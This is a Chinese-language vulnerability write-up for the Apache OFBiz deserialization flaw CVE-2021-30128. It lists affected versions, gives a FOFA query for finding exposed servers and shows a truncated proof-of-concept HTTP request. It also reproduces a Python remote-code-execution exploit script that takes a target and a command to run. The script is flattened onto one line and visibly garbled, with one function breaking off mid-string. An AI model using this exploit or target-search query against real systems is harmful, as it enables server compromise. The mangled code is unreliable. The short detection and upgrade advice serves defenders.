# Apache OFBiz 反序列化 CVE-2021-30128

## 漏洞描述

OFBiz(Open For Business)是一个开源的,基于J2EE和XML规范的,用于构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架(Framework)。

CVE-2021-30128 是 OFBiz `/webtools/control/SOAPService` 接口的 Java 反序列化漏洞:该接口会对 SOAP 请求体中以十六进制编码的 Java 序列化数据(以序列化流魔数 `ACED0005` 开头,见下文 poc)进行反序列化。防御侧可据此在流量或访问日志中检测发往该接口、且请求体以 `ACED0005` 开头的 `text/xml` 请求,并升级到修复版本。

参考链接:

- 阿里云分析:https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w
- r0cky:https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
- https://github.com/r0ckysec/CVE-2021-30128
- https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A

## 漏洞影响

```
Apache OFBiz < 17.12.07
```

修复版本:Apache OFBiz 17.12.07 及以上。

## FOFA

```
app="Apache_OFBiz"
```

## 漏洞复现

poc:

```
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.80.145:8443
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 6093

ACED0005 ... ... 871007E000D78
```

exp:

```py #!/usr/bin/env python # -*- coding: utf-8 -*- """ @Author: r0cky @Time: 2021/3/24-15:09 """ import subprocess import sys import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def banner(): print(""" =================================================== ____ ______ ____ _ ________ _______ / __ \| ____| _ \(_) | ____\ \ / / __ \ | | | | |__ | |_) |_ ____ | |__ \ V /| |__) | | | | | __| | _ <| |_ / | __| > < | ___/ | |__| | | | |_) | |/ / | |____ / . 
\| | \____/|_| |____/|_/___| |______/_/ \_\_| CVE-2021-30128 Powered by r0cky =================================================== """) def bypass(payload): className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'] for cn in className: len_hex = hex(len(cn)).replace('0x','').upper() className_hex = cn.encode().hex().upper() bypass_className = cn + ' {} """.format(post_data) print("[+] payload sending...") r = requests.post(url, data=data, headers=headers, verify=False) if r.status_code == 200: print("[+] send payload success.") print() print("[END] Apache OFBiz RCE Done.") else: print("[-] send payload failed.") print() print("[END] Apache OFBiz RCE failed.") headers={"Content-Type": "text/xml"} if __name__ == '__main__': banner() try: target = sys.argv[1] cmd = sys.argv[2] # target = "https://192.168.80.136:8443" # vps_ip = "10.20.28.16" # vps_port = "9999" url = "{}/webtools/control/SOAPService".format(target) exp(url, cmd) except: print("Example: \n\tpython3 " + sys.argv[0] + " \n") ```